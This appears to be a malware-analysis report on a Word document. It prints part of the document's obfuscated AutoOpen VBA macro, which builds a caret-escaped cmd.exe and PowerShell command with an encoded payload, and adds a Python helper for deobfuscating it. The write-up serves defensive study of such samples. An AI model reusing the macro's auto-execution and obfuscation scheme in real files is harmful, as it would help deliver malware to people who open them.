Malware Insights
The sample is a Word document containing a VBA macro with an AutoOpen procedure, so the macro runs as soon as the document is opened with macros enabled. The macro assembles a cmd.exe command line from many short string literals, interleaved with junk statements (arithmetic on undeclared variables and bare VarType/IsArray calls, all silenced by On Error Resume Next) whose only purpose is to pad and disguise the string-building code, and then, judging by the assembled text, launches PowerShell, most likely to download and run a second-stage payload. Read straight off the listing below, the first builder function XMQOOPAL() returns "Md /v:^ ^ ^ /r ? S^ET  ^  ^ UZnV=p^ow^`rsh`ll^ ;^` ^JAB^OAH^I^AT^AA^9A^G^4^A/^Q^B'AC^0^Ab^w^B^.A^G^o^A/QB(^AH^Q^AIABO^A^G^UAdA^Au^A^FcA/^QB^.^A^E^M^A^bABpAG^UA^bgB^0^AD^s^A^J^A^B^BA^HAAc^QA9^", where "?" stands for one character computed at run time as CStr(Chr(AajGjwkof + zltQTRmfzifdz + 34 + ouKQwCXMlHlO + zXhZjAjkvG)); if those four names are never assigned they evaluate as Empty (zero in arithmetic), the argument is 34 and the character is a double quote. Three points matter before trying to decode this. First, the caret (^) characters are cmd.exe escape characters and vanish when the line is parsed, so the visible text is one layer above the real command. Second, once that layer is removed the variable UZnV holds pow`rsh`ll, i.e. powershell with each e replaced by a backtick; the /v: switch turns on delayed variable expansion, which is what a later !var:old=new! string substitution needs to turn the backticks back into e, but that substitution is not in the truncated preview. Third, the JAB... run has the shape of a base64-encoded UTF-16LE PowerShell script (JAB is how a leading $ encodes), but the chunks contain characters outside the base64 alphabet (', (, ., _, [, #), so the string is not decodable as extracted, and the transformation the macro applies to it is likewise outside the visible portion. Overall this is a typical macro-based initial-access vector delivered by spearphishing.
Heuristics (4)
- VBA macros detected (severity: medium; 1 related finding). Rule OLE_VBA_MACROS: Document contains VBA macro code.
- AutoOpen macro (severity: high). Rule OLE_VBA_AUTOOPEN: AutoOpen macro.
- Legacy WordBasic auto-exec macro marker (severity: medium). Rule OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that the rule's "no modern VBA project was recovered" wording does not hold for this sample: a 36,606-byte VBA source file was extracted (see the artifact below), so this finding corroborates auto-execution rather than being the only evidence of it.
- Embedded URL (severity: info). Rule EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace URI that Office writes into any document containing drawing markup; it is a schema identifier, not a network indicator, and should not be treated as a download or C2 URL.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 36606 bytes |

SHA-256 of macros.bas: 3ce89ccb0922dfe23a802a578af282fb7fc07a5a506d8f6c41cf0daa9e49c078

Preview (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ASAnCpNTT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "hiaXrvZhVhqMVJ"
Function XMQOOPAL()
On Error Resume Next
HbmZk = 88455 + hdWtV
HbmZk = Second(qajWG)
VarType CStr(446458898)
IsArray Sqr(91856 / zijUst * iwPkz / NiuENI)
IsArray 32018 * 64458 / 62173 * NRSjhr
VarType CStr(14)
bajicOMD = "Md /" + "v" + ":^ ^ ^" + " /r" + " " + CStr(Chr(AajGjwkof + zltQTRmfzifdz + 34 + ouKQwCXMlHlO + zXhZjAjkvG)) + " S^" + "ET " + " ^ "
VarType muAZXo + ruFCu
IsArray CStr(pSsdww)
VarType Str(447804539)
VarType Cos(252)
IsArray Month(cibuv)
tPjiC = " ^ " + "UZnV=" + "p^ow^" + "`rs" + "h`ll" + "^ ;^` "
HbmZk = LCase(ltajti * 80761)
IsArray CDate(zzwtM)
VarType Rnd(66923 / Wbdwn + 76957 - tOwJP)
YOpTU = "^JAB" + "^OA" + "H^I^A" + "T^" + "AA" + "^9" + "A^G^" + "4^A/^Q" + "^B'AC" + "^0" + "^Ab^w^B" + "^.A^G^"
IsArray CDate(iGJjDM)
VarType CDate(255830362)
VarType Str(44)
SKHLKDIj = "o^A/" + "Q" + "B(" + "^AH^Q" + "^A" + "IABO^" + "A^G" + "^UA" + "dA^A" + "u^A^Fc" + "A" + "/^Q" + "B^.^A^E"
VarType Rnd(4)
IsArray CYmVI * 42592
HbmZk = 93195 * VZfrn
HbmZk = hwHMFs / XnGkKz * wABorc * 45743
TbbSMfH = "^" + "M^A^b" + "ABpAG" + "^UA^" + "bgB^" + "0" + "^AD^s^" + "A" + "^J^A" + "^B^BA" + "^HAAc^Q" + "A9" + "^"
XMQOOPAL = bajicOMD + tPjiC + YOpTU + SKHLKDIj + TbbSMfH
IsArray Val(15)
IsArray CStr(23)
IsArray Log(uaJTnY)
VarType 98837 - GCBqT
End Function
Function wfhzSmJL()
On Error Resume Next
HbmZk = Month(85559 * CNEbcm)
IsArray 58939 / YQuiN + 21147 * 34620
HbmZk = LCase(272)
IsArray ziDjw - 40010
IsArray Int(1449 - XAWYRW)
IsArray Int(636)
immusD = "AC" + "c^A^a" + "AB0AH" + "Q" + "AcAA^6^" + "AC8^AL" + "w^B(AG8" + "A^bgB^" + "kA" + "^Gk" + "A^"
HbmZk = Rnd(jhTFCQ)
IsArray CDate(36829 * GICsc / cUSDW / 62313)
IsArray 79301 * UnfBr * 94741 - CzdGGm
HbmZk = TXfid + RVJZf + 29913 / Iksus
GAkhbwazvd = "`^gB^l" + "^AH" + "^IA^L^g" + "^B(^A^G" + "8" + "A^b" + "^Q^A7" + "AH" + "Q^" + "Ac^"
HbmZk = 91345 / YwiHL * 21554 - oaMZzK
IsArray 51918 * 15079
qwkMpZBr = "wB" + "0AC8^" + "Aa^QBuA" + "^G" + "Q" + "A/" + "QB" + "^4AC^4" + "A" + "c^A" + "^B"
IsArray kzdMN - TkZJif
IsArray Round(KzivV)
JjjpjaIwMj = "o^A" + "^H" + "^AA_" + "^w^Bs^" + "A^D^0A" + "cwB" + "7^AG^g^" + "Abw" + "A5^" + "A" + "C4Ad^A^" + "BrA" + "^G4"
VarType CBool(6872)
VarType Tan(wTqZw)
ProiORISwJw = "^A^JwA" + "u" + "A" + "^FMAc^A" + "B" + "^" + "sA^G^kA" + "dA^A^" + "o" + "^ACcAQ" + "A" + "^"
HbmZk = Log(jujKJu)
HbmZk = raJfv + jrzisL
HbmZk = Tan(2)
HbmZk = zwdis - PViHW
HbmZk = MvBFwa + KfdqC
NHtwKCtXr = "An^AC^" + "kAOwA^" + "kAH^MA" + "[QB^" + "uACA^A" + "_" + "Q" + "^AgACcA" + "MQ^A1^A" + "DAA" + "J" + "wA^#"
HbmZk = CCur(wSZaqq)
IsArray CDate(84312 + IwuTw)
IsArray Fix(fPrwD)
IsArray CByte(8005)
VUpAswR = "A" + "C^" + "Q^A^SA^" + "B^K^A^" + "G^k^A^_" + "^Q^A^k" + "A^" + "GUA"
wfhzSmJL = immusD + GAkhbwazvd + qwkMpZBr + JjjpjaIwMj + ProiORISwJw + NHtwKCtXr + VUpAswR
HbmZk = 71892 * tRVnbF + iXPhv / 12786
IsArray 56790 + 67117 - pHczo * ahEspl
End Function
Function zwlScioYLa()
On Error Resume Next
VarType pDzSrr - lkUwbU - rAqNc - 78148
IsArray nEcuG + MYzWb - 1988 - DwLrd
uqTihcErAWw = "^b" + "^g^B" + "^2^A" + "^D^o^Ac" + "^A" + "B^1" + "^AGIA" + "bAB^p^A" + "GMA" + "KwAnA" + "Fw^" + "AJ^w" + "^Ar"
VarType 84047 - qMGUNs
IsArray AvjQt / zlQZMX / 52924 + 1687
VarType Atn(124030663)
cwRzZWiPWa = "^AC^Q^" + "Acw^B^h" + "A^G4" + "A" + "KwAnAC" + "^4^A/" + "^" + "Q^B^4A" + "^G^" + "UA^J" + "^wA#" + "AG^[A^b" + "^wB^"
VarType 77841 * 6818 / VwnORI + 26292
VarType Sqr(lJTYZz * FanDWu / kzfHOL + 75938)
UMQhmt = "5^A^G^" + "UA^[^Q" + "^B" + "(A" + "G^gA^" + "K^" + "A^Ak" + "^AE^MA"
HbmZk = 78891 - 38964 * 2778 - NjOHf
VarTyp
```
... (truncated)
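To see what the listing above actually assembles without running the macro, the following Python helper (an added example written for this page, not code from the analyzer or from the sample) replays the macro's string concatenations statement by statement, skips the junk statements that build no string, substitutes a placeholder for any term that is computed at run time (here the CStr(Chr(...)) call), and then strips the cmd.exe caret escapes. Its input is a constructed excerpt of the XMQOOPAL() statements copied from the preview; the "<expr>" placeholder and the function names are this example's own conventions. It recovers the first layer only: the backtick-for-e substitution and whatever turns the JAB... run into valid base64 live in code outside the truncated preview and are not attempted here.

```python
import re

# Constructed sample input: the string-building statements of XMQOOPAL() copied
# from the macro preview on this page, with a few of the surrounding junk
# statements kept so the filter can be seen skipping them.
SAMPLE_MACRO = r'''
Function XMQOOPAL()
On Error Resume Next
HbmZk = 88455 + hdWtV
VarType CStr(446458898)
bajicOMD = "Md /" + "v" + ":^ ^ ^" + " /r" + " " + CStr(Chr(AajGjwkof + zltQTRmfzifdz + 34 + ouKQwCXMlHlO + zXhZjAjkvG)) + " S^" + "ET " + " ^ "
VarType muAZXo + ruFCu
tPjiC = " ^ " + "UZnV=" + "p^ow^" + "`rs" + "h`ll" + "^ ;^` "
YOpTU = "^JAB" + "^OA" + "H^I^A" + "T^" + "AA" + "^9" + "A^G^" + "4^A/^Q" + "^B'AC" + "^0" + "^Ab^w^B" + "^.A^G^"
SKHLKDIj = "o^A/" + "Q" + "B(" + "^AH^Q" + "^A" + "IABO^" + "A^G" + "^UA" + "dA^A" + "u^A^Fc" + "A" + "/^Q" + "B^.^A^E"
TbbSMfH = "^" + "M^A^b" + "ABpAG" + "^UA^" + "bgB^" + "0" + "^AD^s^" + "A" + "^J^A" + "^B^BA" + "^HAAc^Q" + "A9" + "^"
XMQOOPAL = bajicOMD + tPjiC + YOpTU + SKHLKDIj + TbbSMfH
IsArray Val(15)
End Function
'''

# Placeholder for any term that is neither a string literal nor a variable
# already built from literals (this example's own convention, not the tool's).
UNRESOLVED = "<expr>"

ASSIGN_RE = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.*?)\s*$')
FUNC_RE = re.compile(r'^\s*(?:Public\s+|Private\s+)?(?:Function|Sub)\s+([A-Za-z_]\w*)', re.IGNORECASE)
END_RE = re.compile(r'^\s*End\s+(?:Function|Sub)\b', re.IGNORECASE)

def split_concat(rhs):
    # Split on '+' outside string literals and parentheses, so Chr(a + b) stays one term.
    terms, buf, in_str, depth, i = [], [], False, 0, 0
    while i < len(rhs):
        c = rhs[i]
        if in_str:
            buf.append(c)
            if c == '"' and i + 1 < len(rhs) and rhs[i + 1] == '"':
                buf.append('"'); i += 1          # doubled quote inside a literal
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True; buf.append(c)
        elif c in '()':
            depth += 1 if c == '(' else -1; buf.append(c)
        elif c == '+' and depth == 0:
            terms.append(''.join(buf).strip()); buf = []
        else:
            buf.append(c)
        i += 1
    terms.append(''.join(buf).strip())
    return terms

def eval_term(term, env):
    # A literal yields its text, a known variable its value, anything else the placeholder.
    if len(term) >= 2 and term[0] == '"' and term[-1] == '"':
        return term[1:-1].replace('""', '"')
    if re.fullmatch(r'[A-Za-z_]\w*', term) and term in env:
        return env[term]
    return UNRESOLVED

def recover_strings(macro_source):
    # Replay every assignment that concatenates literals or string-valued variables.
    # Returns (variables, per-function return values).
    env, returns, current = {}, {}, None
    for line in macro_source.splitlines():
        m = FUNC_RE.match(line)
        if m:
            current = m.group(1); continue
        if END_RE.match(line):
            if current in env:                # VBA returns by assigning to the function name
                returns[current] = env[current]
            current = None; continue
        m = ASSIGN_RE.match(line)
        if not m:
            continue                          # bare calls such as VarType CStr(446458898)
        name, rhs = m.groups()
        terms = split_concat(rhs)
        if not any(t.startswith('"') or t in env for t in terms):
            continue                          # numeric junk such as HbmZk = 88455 + hdWtV
        env[name] = ''.join(eval_term(t, env) for t in terms)
    return env, returns

def cmd_unescape(s):
    # Strip cmd.exe caret escapes: '^x' is the literal x, so '^^' is '^'; a trailing lone caret is dropped.
    out, i = [], 0
    while i < len(s):
        if s[i] == '^':
            if i + 1 < len(s):
                out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i]); i += 1
    return ''.join(out)

def recover_command(macro_source, func_name):
    # (raw concatenation, caret-stripped form) of one builder function.
    _, returns = recover_strings(macro_source)
    raw = returns[func_name]
    return raw, cmd_unescape(raw)
```

Calling recover_command(SAMPLE_MACRO, "XMQOOPAL") gives the raw concatenation and its caret-stripped form; in the stripped form the UZnV value reads pow`rsh`ll, and replacing the backtick with e yields powershell, which is the cue that the remainder of the command is a cmd string-substitution layer worth recovering from the full 36,606-byte macro rather than from this preview. The same helper works unchanged on wfhzSmJL() and zwlScioYLa() once their statements are pasted in.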